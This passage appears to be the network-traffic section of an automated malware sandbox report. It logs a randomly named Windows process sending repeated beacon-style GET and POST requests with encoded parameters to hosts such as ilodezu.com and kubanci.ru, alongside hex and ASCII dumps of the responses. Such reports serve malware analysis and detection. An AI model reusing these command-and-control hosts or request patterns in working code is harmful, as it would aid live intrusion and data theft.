                                  Data Ascii: FNPd=itJov2veHmLEB+bs0guXISnML84nUKc0/dntiPyMBG2WDVm2+PZTF/Az7L1pKFqvd08DE3HpflgxAYHBVS+XO2cxlmLK6Bhyaw3AfwomRJh8ENtmI+BIe72Yy0eVzHnQpLNnizVWeQbEgohUu9Mu7GMLaia8paKBZOByYni9dvwMOCyosFulZF3O3CwBSJJiCUJTaJSxJapN3OGYxhFdnPuEHGqZWOTtGXOF5hEpdaGYaUFj71A5CQw7pbovV9Dvyncoy9tIp/dmMF8rnrvaZCJez8BWX77a4rwWFIcrgNUPv4wYNvsfdM9a7SrqrOGaUlWSeb+9LhUCe0VrwNCgL+jPIWSAjcl/oiLqnQ+ZUlrexs40cVLc/QmxSoEt9sGAarmvVZc2uMYe9r21o6F1oEwAe6mP9JjphNyfpEovqfOiGXDMLyUMdnFp/13bp4iYEODV/ICR+8Kc1koo5LWXHmHkpWKhBqIZT5je8BYAP7uf1PuxgzyjPWl2ufzZQXBNUgNBhCqA9la6cRJVk3JYAXnDIpqF8sFdMa86+w6PBzbZJJMGQx0QKn5p7UNUP+2ujoeHkyrJzwUwymD/GrMUNBveMBpSYQiZv0X7x/lXwwt+V3bZ80S9l2PytB+cFYXcS+n8aDD9Sj2W6ihR0mSvMVMuhCYnoPm/wwrVQCqQc25Up2aBrHHpq59er20o5Qm7Y46JjG02oqrDTuOV5AmR8z6U5VLdCFKmPl9cbO7bA+C20aMOrw9Y432tV11xcPSuDOohWheiqyhCJl1SafrOmRBnz1lLyyuNV9/3p6GzeTe9dzj5gxhQpbQ5t42sQt86r3RcaEq27rV0keqShSGlpU3Q2IBQScwc5Npu/13IuKhvTPtAOf1dTIHn/7hBMYd1E7BRwcoYCFa2WrUdSlVVrdea/wziPjppMyNTNs5pck4PWtfCLvbacy1D9JITdqY8Nr+I2Nk5/LcnLz+HxjuCFLKYJ8do2RT9GQ7fWL49dppKouR [TRUNCATED]
                                  May 23, 2024 15:21:07.644262075 CEST1236INHTTP/1.1 404 Not Found
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:07 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  X-Powered-By: PHP/8.3.2
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  Link: <http://novosti-dubai.ru/wp-json/>; rel="https://api.w.org/"
                                  Content-Encoding: gzip
                                  Data Raw: 33 30 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 8f e3 46 92 e0 e7 2e 60 fe 43 5a 46 bb 4b b6 28 91 d4 b3 aa ba ca eb 27 c6 c0 b8 c7 b0 3d 33 3b 70 37 04 8a 4c 49 ec a6 44 9a a4 4a 55 2e 17 b0 3b 73 b7 f7 e1 16 b7 38 60 bf dd 87 c5 fd 03 ef 60 06 f3 ba 99 fb 0b d5 ff e8 22 22 33 c9 24 45 3d aa 4a 65 cf e2 b6 1f 55 52 66 64 44 64 64 64 64 e4 2b f2 e9 1b 1f fe f4 83 2f 7f f9 d9 47 6c 9a ce 82 b3 83 a7 f8 8b 05 ce 7c 72 5a 8b 17 c6 e7 3f ab 61 1a 77 bc b3 83 47 4f 67 3c 75 98 3b 75 e2 84 a7 a7 b5 9f 7d f9 b1 31 a8 61 7a e0 cf 5f b1 98 07 a7 b5 28 0e c7 7e c0 6b 6c 1a f3 f1 69 6d 9a a6 51 72 dc 6a 4d 66 d1 a4 19 c6 93 d6 c5 78 de b2 ac 72 21 7f 3e 19 39 ee 2b bd 14 14 9a 87 e7 61 92 fa 86 b7 18 39 7e 33 5e b4 2e 66 41 1c b9 cd 68 1a 01 02 c0 90 fa 69 c0 cf 6e fe f7 eb 5f bd fe 87 9b ef 6e fe 72 f3 87 d7 ff 74 f3 1d 83 0f bf c3 1f df dd fc f1 e6 b7 37 bf c3 4f ec ad 37 07 b6 65 9f b0 9b 7f bb f9 eb eb 7f bc f9 33 24 ff 16 0b 20 e4 77 37 7f 02 0c bf 86 df 7f 7e fd cf 37 7f 79 fd df 45 f1 bf de fc [TRUNCATED]
                                  Data Ascii: 308d}kF.`CZFK('=3;p7LIDJU.;s8``""3$E=JeURfdDdddd+/Gl|rZ?awGOg<u;u}1az_(~klimQrjMfxr!>9+a9~3^.fAhin_nrt7O7e3$ w7~7yEa__!z 1wfI4ypyzds_4<A.'F;}"d9IOn8+9AB(|Ip-daNk{+v^ sU[h7M0MH*$I/L9O0;}QN|iIw(`-OVK4g6O0"m|Bo q8cn$~6\YvvJ!P,<=~Xzc{2+HiJ^?0<*$]#N6W0~;44&|cPb:hfm=Zi8Q-07ZI.!SvvOFa_$G'#:^<s~
                                  May 23, 2024 15:21:07.644926071 CEST224INData Raw: 42 b2 f6 b8 1b c6 d4 4b 44 62 e4 78 1e d8 d8 63 d7 09 dc c3 66 af d7 e7 33 f6 0e b3 a3 8b 3a a3 24 ab d9 6e b7 b3 b4 13 34 28 46 e2 7f c3 8f ad a6 65 77 f9 ec 3a e7 1a 6b 36 1c 0a de af 72 56 33 26 b5 8a 54 b1 72 5d 29 e9 49 10 8e 9c 60 27 11 8f
                                  Data Ascii: BKDbxcf3:$n4(Few:k6rV3&Tr])I`'B00BJ7MsR^:s\_Mg4jO9O5L@wIWg8wlsW"@xwZ2lc,~2|NRsGMM3B
                                  May 23, 2024 15:21:07.646743059 CEST1236INData Raw: 51 c2 46 ee 07 dc b3 c6 ee 26 dc 3a b4 d9 3b 6a f3 35 6d 22 a0 a3 45 1c 05 08 7a 34 ea 5a bc 5c c7 09 f6 11 b0 34 2b b8 0d e8 8e 45 04 a8 6a 4e 9c 95 38 b4 da 5d 8f 4f 1a 31 38 24 87 bd 86 d5 e9 37 6c bb df b0 ea cc 7c 8c 89 87 56 b7 db 18 58 90
                                  Data Ascii: QF&:;j5m"Ez4Z\4+EjN8]O18$7l|VX3ib\Omc679hXms+@&1]x6\mXL+d.kl600\fM\"U#!:;tQwy7tDMl#~hu5MTg.lAG
                                  May 23, 2024 15:21:07.646754980 CEST1236INData Raw: 11 a6 05 c9 5b b4 6c 4f 47 5e e4 69 25 48 ea 9d 54 9f 94 59 86 21 1d 2d 8b dd ec 0c d6 e6 a3 58 5a 01 36 0e e3 19 6b e2 4f 23 0e 97 ac 19 f3 af 17 3e 8c 53 ec 8a 9d fb 89 3f f2 03 3f bd 3c 16 9f 03 7e c2 74 16 d6 1f 5e 7b 99 0c 81 02 c8 9d c7 c3
                                  Data Ascii: [lOG^i%HTY!-XZ6kO#>S??<~t^{q<,'-OLO6-pm?QI;-`Ir\4rn@II?|QOMtwDWT!U{UJ`9|@=0zYI)z
                                  May 23, 2024 15:21:07.646764994 CEST1236INData Raw: e0 89 fa 18 6e c4 75 a0 9a 56 d3 6c b0 99 73 e1 cf 16 33 3d 69 01 1d 87 be 3b 23 48 82 e1 4e 12 14 54 e7 a1 6a 23 71 40 42 3f 67 91 ed 95 4c c0 43 05 d7 e6 8a 85 78 89 16 8f 56 58 fa 09 1a 76 ad 8e 57 3c 6d 65 f8 0e 1e c9 d3 1e 9a a6 82 d3 5b 3b
                                  Data Ascii: nuVls3=i;#HNTj#q@B?gLCxVXvW<me[;k=bRbbe!-`K|.q;./>{Zg0'e/`^L3C1 Y5z_"7<[M7"`y40?8Y`K?[bclM9@)k
                                  May 23, 2024 15:21:07.650397062 CEST1236INData Raw: a6 61 15 9b c5 fc ca 9a 94 40 b6 d5 c7 0d 42 bc b1 a0 e5 5f 1f 1c 1c 34 97 d3 91 28 0b 76 9d be 64 f5 a6 62 90 e6 19 38 cb 02 e3 34 17 77 44 92 05 94 80 ff d0 61 16 d4 05 c4 44 15 25 0b ba 60 4a cc f7 45 7c 4c 8b d7 88 5e 5d b2 b0 15 ea 83 83 bf
                                  Data Ascii: a@B_4(vdb84wDaD%`JE|L^]%v",,T4%.0v}Ui@FbP=jtn[5MDpBgM[Wql)n)m\K6.JUe5@fzi?Ra-Da
                                  May 23, 2024 15:21:07.650432110 CEST1236INData Raw: 73 44 7f 64 3f ff ec 19 bb f9 2d 24 fc 0b bb f9 0d 20 f9 dd eb ff ca 5e ff 1a 1f 27 7a fd 0f 00 fc 47 7a a6 e8 37 ec ed d6 8f 0e 9a 33 3c d3 33 4f 87 36 bb fa d1 01 83 3f c5 b0 ce 22 4d 44 9e c0 ee 25 be eb fd d3 ea e4 e9 59 9f 35 1f 67 90 32 f4
                                  Data Ascii: sDd?-$ ^'zGz73<3O6?"MD%Y5g22[#YH%G?:j0jZG#a{6QKX*x]kL'um@^[_1H+bQ1O[%5_v{X9s%1tb"jhPK4E&
                                  May 23, 2024 15:21:07.654035091 CEST1236INData Raw: 99 0d 6a bc 20 9c d0 b5 b0 a7 ce 96 db 2e b5 8c 98 47 85 18 06 63 41 81 13 06 79 c3 2f 9c 09 bd 7b ea cf 26 c2 d6 9d d6 ba a6 59 93 8e c6 69 cd ee 9a bb df 54 2c af 5b 22 25 c3 16 77 54 24 33 4e 9a 3a ee 94 82 33 63 cf a5 1b 3e f4 a9 06 46 39 c5
                                  Data Ascii: j .GcAy/{&YiT,["%wT$3N:3c>F9Sd"Nk&o/!@\~K`8&^~;79gl;0:m>T~li~5~z^1@#J-QjM_a^Jv3>1m]Km:2cT?X._
                                  May 23, 2024 15:21:07.654047966 CEST1236INData Raw: 3a b7 69 c4 0a ce 36 b7 21 14 f0 f8 2c 34 7c 0f 7a b1 fe ce d5 2e 0b ae 8b c8 a3 2d 6c ba 1a 16 3b 13 11 1f 78 ec 5f 6c 8d 56 e7 89 d0 8e 59 a1 87 0c f2 48 94 a6 4e 32 1d be e2 97 00 09 e5 f2 a4 5e bf df 75 8e bc f1 98 8f bb fd ce 80 1f f5 dc 41
                                  Data Ascii: :i6!,4|z.-l;x_lVYHN2^uA;m-nAyQ>{20g\dS6mt[>UM>/cmjG^V5YcehY1m)!v|a"OTMUo)#QTO"]T"svY\']m[Gyx
                                  May 23, 2024 15:21:07.657695055 CEST1236INData Raw: eb 39 a9 4a 34 95 a8 b6 9f 9d 5a 8b 8b f0 3d 6e 66 67 15 1e af a3 f9 9c d6 da ef c6 50 e5 b9 97 6d 2c e5 37 d6 a9 f1 e6 ce f9 83 f0 56 75 86 e6 16 ac 5d d2 01 4a 18 61 d6 31 b7 52 44 ec 2d 89 f0 68 2b 11 0b 84 99 ad 23 b2 e7 69 fe b7 80 60 e9 27
                                  Data Ascii: 9J4Z=nfgPm,7Vu]Ja1RD-h+#i`'Sa3EB{gqry,Y)i7Xj*JVs8GC1$FrH;4;r,nb>Rr`Cw0#a09'>9pIL
                                  May 23, 2024 15:21:07.657706976 CEST1236INData Raw: 21 d7 16 a3 be 03 50 80 9e 6c bf 37 68 1e 0d 70 29 1f 9d 20 13 99 98 a1 37 4b f2 c9 1f 91 d1 76 2a 05 6e 8c 9c 91 cd 91 31 13 9c 05 74 68 b1 7d cb d9 72 41 9d 7a 91 58 c0 9e f3 d2 9c 32 9f 05 e0 cc c2 15 1b 1a 72 7e 0e 93 7d 7f 22 f6 6e bc d8 0f
                                  Data Ascii: !Pl7hp) 7Kv*n1th}rAzX2r~}"niePd"C\"WYk<F2zI`hVH WN.reWtA"[;))aDXriEg*63P1TdJ.\Ez3NpUn("^v#LVslDB


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  36192.168.2.64974287.236.16.214803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:09.103352070 CEST495OUTGET /pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMYwsFeTDzET5UctfaR3GvIGUh8HX7yBNnSQfVfxhBU4FjPt5zEeZpSpbIsG6X42DlnYxUoU4=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.novosti-dubai.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:21:10.668983936 CEST530INHTTP/1.1 301 Moved Permanently
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:10 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 0
                                  Connection: close
                                  X-Powered-By: PHP/8.3.2
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  X-Redirect-By: WordPress
                                  Location: http://novosti-dubai.ru/pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMYwsFeTDzET5UctfaR3GvIGUh8HX7yBNnSQfVfxhBU4FjPt5zEeZpSpbIsG6X42DlnYxUoU4=&zdK0d=M8mTZ0xHNd1dPVm


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  37192.168.2.649743188.114.96.3803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:15.750020027 CEST739OUTPOST /z48v/ HTTP/1.1
                                  Host: www.ilodezu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.ilodezu.com
                                  Referer: http://www.ilodezu.com/z48v/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 59 35 73 68 6c 64 79 39 6c 53 4f 55 39 4d 7a 69 52 61 57 4a 51 41 65 54 4e 76 50 52 46 75 46 54 32 6b 4a 73 76 78 36 6e 69 50 34 55 6a 68 32 41 69 39 6b 65 59 68 4f 4e 74 43 32 47 5a 2b 4b 58 49 62 39 50 64 7a 78 56 7a 4c 73 6b 42 4b 53 58 52 66 59 74 61 2f 45 69 51 6e 65 70 50 75 35 7a 35 57 2f 70 57 6a 30 70 54 47 57 49 52 75 7a 57 77 38 2b 2f 79 59 64 46 55 43 63 7a 47 56 4e 78 35 50 53 2b 4b 55 52 52 51 32 63 4f 6c 37 53 4d 55 38 49 6b 2f 6d 30 66 49 72 4f 30 38 61 47 4c 2f 58 4a 4a 78 69 79 72 77 4e 37 46 73 62 35 64 6e 32 73 5a 59 2b 52 74 50 4e 52 2f 73 4d 7a 30 34 57 30 2b 50 42 78 58 43 38 51 32
                                  Data Ascii: FNPd=Y5shldy9lSOU9MziRaWJQAeTNvPRFuFT2kJsvx6niP4Ujh2Ai9keYhONtC2GZ+KXIb9PdzxVzLskBKSXRfYta/EiQnepPu5z5W/pWj0pTGWIRuzWw8+/yYdFUCczGVNx5PS+KURRQ2cOl7SMU8Ik/m0fIrO08aGL/XJJxiyrwN7Fsb5dn2sZY+RtPNR/sMz04W0+PBxXC8Q2


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  38192.168.2.649744188.114.96.3803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:18.289376974 CEST763OUTPOST /z48v/ HTTP/1.1
                                  Host: www.ilodezu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.ilodezu.com
                                  Referer: http://www.ilodezu.com/z48v/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 59 35 73 68 6c 64 79 39 6c 53 4f 55 39 70 37 69 58 35 75 4a 56 67 65 55 43 50 50 52 4d 4f 45 61 32 6b 46 73 76 7a 58 38 69 39 73 55 6b 44 75 41 77 38 6b 65 66 68 4f 4e 2f 69 32 50 47 4f 4b 51 49 62 77 73 64 79 68 56 7a 4c 34 6b 42 50 32 58 51 73 77 71 62 76 45 6b 64 48 65 76 4c 75 35 7a 35 57 2f 70 57 6e 56 30 54 47 4f 49 52 62 37 57 78 59 69 38 2f 34 64 47 54 43 63 7a 43 56 4e 31 35 50 53 51 4b 52 4a 2f 51 30 30 4f 6c 36 69 4d 56 74 49 6e 31 6d 30 5a 58 37 50 73 32 36 4c 67 78 42 45 54 39 44 33 4e 6f 2b 37 44 70 74 34 48 37 46 73 36 4b 75 78 76 50 50 4a 4e 73 73 7a 65 36 57 4d 2b 64 57 39 77 4e 49 31 56 5a 69 68 6a 74 72 33 62 4d 46 4b 44 43 72 2f 6f 47 47 4d 41 36 51 3d 3d
                                  Data Ascii: FNPd=Y5shldy9lSOU9p7iX5uJVgeUCPPRMOEa2kFsvzX8i9sUkDuAw8kefhON/i2PGOKQIbwsdyhVzL4kBP2XQswqbvEkdHevLu5z5W/pWnV0TGOIRb7WxYi8/4dGTCczCVN15PSQKRJ/Q00Ol6iMVtIn1m0ZX7Ps26LgxBET9D3No+7Dpt4H7Fs6KuxvPPJNssze6WM+dW9wNI1VZihjtr3bMFKDCr/oGGMA6Q==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  39192.168.2.649745188.114.96.3803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:20.823626041 CEST1776OUTPOST /z48v/ HTTP/1.1
                                  Host: www.ilodezu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.ilodezu.com
                                  Referer: http://www.ilodezu.com/z48v/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 59 35 73 68 6c 64 79 39 6c 53 4f 55 39 70 37 69 58 35 75 4a 56 67 65 55 43 50 50 52 4d 4f 45 61 32 6b 46 73 76 7a 58 38 69 39 30 55 6b 32 36 41 7a 66 38 65 65 68 4f 4e 38 69 32 43 47 4f 4c 56 49 62 6f 77 64 33 34 71 7a 50 49 6b 42 70 36 58 46 70 4d 71 53 76 45 6b 42 33 65 71 50 75 35 6d 35 57 50 6c 57 6a 78 30 54 47 4f 49 52 61 4c 57 32 4d 2b 38 35 34 64 46 55 43 63 2f 47 56 4e 4e 35 50 4c 74 4b 52 39 42 51 45 55 4f 6b 61 79 4d 58 66 67 6e 7a 32 30 62 55 37 50 2f 32 36 48 2f 78 48 67 70 39 44 43 6d 6f 38 6e 44 70 4a 68 68 72 57 63 51 59 76 74 76 57 4f 78 66 6b 4a 58 74 69 77 77 4e 51 6e 42 2f 50 35 64 6b 63 30 74 65 6e 70 2b 66 4d 57 43 4c 4a 72 43 2b 45 33 4a 45 75 74 6e 2b 61 6a 45 50 6d 61 77 65 7a 6a 67 66 2f 32 76 51 38 6e 67 32 38 62 2b 4e 61 75 4b 59 46 56 57 70 57 41 45 30 4b 64 79 65 45 36 31 32 32 41 74 59 53 58 49 77 47 6e 67 4f 4d 45 55 4a 74 36 59 76 50 6b 38 57 51 4b 39 36 46 4f 42 31 47 36 48 4a 70 67 62 39 2b 42 65 79 64 70 47 52 33 35 7a 4d 36 67 58 33 2b 72 73 47 64 [TRUNCATED]
                                  Data Ascii: FNPd=Y5shldy9lSOU9p7iX5uJVgeUCPPRMOEa2kFsvzX8i90Uk26Azf8eehON8i2CGOLVIbowd34qzPIkBp6XFpMqSvEkB3eqPu5m5WPlWjx0TGOIRaLW2M+854dFUCc/GVNN5PLtKR9BQEUOkayMXfgnz20bU7P/26H/xHgp9DCmo8nDpJhhrWcQYvtvWOxfkJXtiwwNQnB/P5dkc0tenp+fMWCLJrC+E3JEutn+ajEPmawezjgf/2vQ8ng28b+NauKYFVWpWAE0KdyeE6122AtYSXIwGngOMEUJt6YvPk8WQK96FOB1G6HJpgb9+BeydpGR35zM6gX3+rsGd609TBSfgj8ejmcKAafZk3fVnPUgpsHZuGHfjuq/ovdYtAb32jsUK9c9z5/WwstntCwjn3SUky2VmH6gCHFgUmVW6fM3UlGMPeNnfiOJ9BVh70CjHqxlryaCUpd0CCYtjFHIsp3hvKIXHwFul9Tso3xaOLvNkCjCsUZL9zqhzxTcu30pEf+QuxdEFDG8KY8KbnC/JxVcVESeLHXGcm58tgn+6gjMof0wohqTiMdCRZVi5WAaVelhFnxoQVAqLevdBr5ixrZ1x/0BAv/uwbMrH1zOosFoFc76kyOELGLZR7RyZZe20oCcwW9aLIyxTVdF5SJbI/smwqHWcNlFZ3RjTWNQt0eeKiTshmZNhyFo+2++WcOXMKgi2/Wcx1z/oxF03cgFrzQ/AXFPNNrtHqaFr5cI6OJ06/i640NEYOJ51W2tOX/Xpfd29jG93TqQ/+/lWnVDtbWm9xc/nlGOjnZ5A6lHfUSXAFSYjTNW9NPMSGGGGWpMVPIiVbCmNv90o7er8pbEjCxIKiYEl0YzTHoP0zs6fLteuLSGkfkq6NwF4RkiUs3y3VDJ0nei30qu2FtCkOX7UGjb+uaQq9nTVdOC/tN5PuNa0+gverk08E0a+R8ID0814gB2XS2ZpdmWjNR6yJFOpBo9qt7Ci2ysqhkzl2Q0IbFcf79umGS [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  40192.168.2.649746188.114.96.3803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:23.355711937 CEST490OUTGET /z48v/?FNPd=V7EBmqWgiCvSgvqad7SyaCOgC+e4BvQG3ktlhx6lo/cZrGqdjKlpWUio9FOhJOaxZOVNIG538/ROKaWARcsTTcMUAhKYPtR70XL2Xhx4NmC7fpbV6q2t8I9SMzcLGlFD+PeBXEg=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.ilodezu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:21:25.013010025 CEST552INHTTP/1.1 567 unknown
                                  Date: Thu, 23 May 2024 13:21:24 GMT
                                  Content-Length: 17
                                  Connection: close
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMy6kRZtgXf1dY7qVo0E1Ho7tdMxipi0CHAnKGHFyU11GrxSMRaKQb1k%2FG3zWnX3AHpJ6ah6f%2FYPOwZlBFSCI6l%2BakoiilhK4%2Bj%2BiikAwHfvc19AjJUar5e0dd9FJa00XD8%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8885594b7b3ec448-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                  Data Ascii: Request too large


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  41192.168.2.649747194.58.112.174803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:30.227165937 CEST736OUTPOST /3nn5/ HTTP/1.1
                                  Host: www.kubanci.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.kubanci.ru
                                  Referer: http://www.kubanci.ru/3nn5/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 31 56 70 2b 31 46 62 2f 76 30 66 6d 33 41 47 49 41 44 79 37 67 77 64 65 32 74 43 36 42 72 6f 7a 71 66 2b 2f 32 55 43 67 50 68 57 55 6b 35 59 55 34 4b 31 50 33 41 38 71 64 76 49 2b 61 74 6e 64 68 69 51 37 7a 6b 57 30 6b 73 32 43 4a 41 4e 58 33 55 4b 79 58 68 6c 39 73 4b 42 7a 30 64 64 45 6e 58 61 6f 4d 6f 45 42 45 70 35 79 70 44 4f 30 58 52 75 6e 64 75 62 68 59 64 72 35 64 35 4c 39 76 42 50 32 45 74 33 64 54 68 6f 6d 64 2f 73 6c 31 6a 6f 61 6c 4c 49 72 35 41 64 7a 50 55 43 53 68 69 49 71 2f 53 49 68 47 4e 6f 4e 4b 42 79 6f 44 67 35 78 37 44 34 37 69 47 77 77 39 48 58 54 62 73 6f 6b 32 6d 48 48 4b 41 75 64
                                  Data Ascii: FNPd=1Vp+1Fb/v0fm3AGIADy7gwde2tC6Brozqf+/2UCgPhWUk5YU4K1P3A8qdvI+atndhiQ7zkW0ks2CJANX3UKyXhl9sKBz0ddEnXaoMoEBEp5ypDO0XRundubhYdr5d5L9vBP2Et3dThomd/sl1joalLIr5AdzPUCShiIq/SIhGNoNKByoDg5x7D47iGww9HXTbsok2mHHKAud
                                  May 23, 2024 15:21:30.924962044 CEST340INHTTP/1.1 302 Moved Temporarily
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:21:30 GMT
                                  Content-Type: text/html
                                  Content-Length: 154
                                  Connection: close
                                  Location: http://kubanci.ru/3nn5/
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  42192.168.2.649748194.58.112.174803152C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  TimestampBytes transferredDirectionData
                                  May 23, 2024 15:21:32.767630100 CEST760OUTPOST /3nn5/ HTTP/1.1
                                  Host: www.kubanci.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.kubanci.ru
                                  Referer: http://www.kubanci.ru/3nn5/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
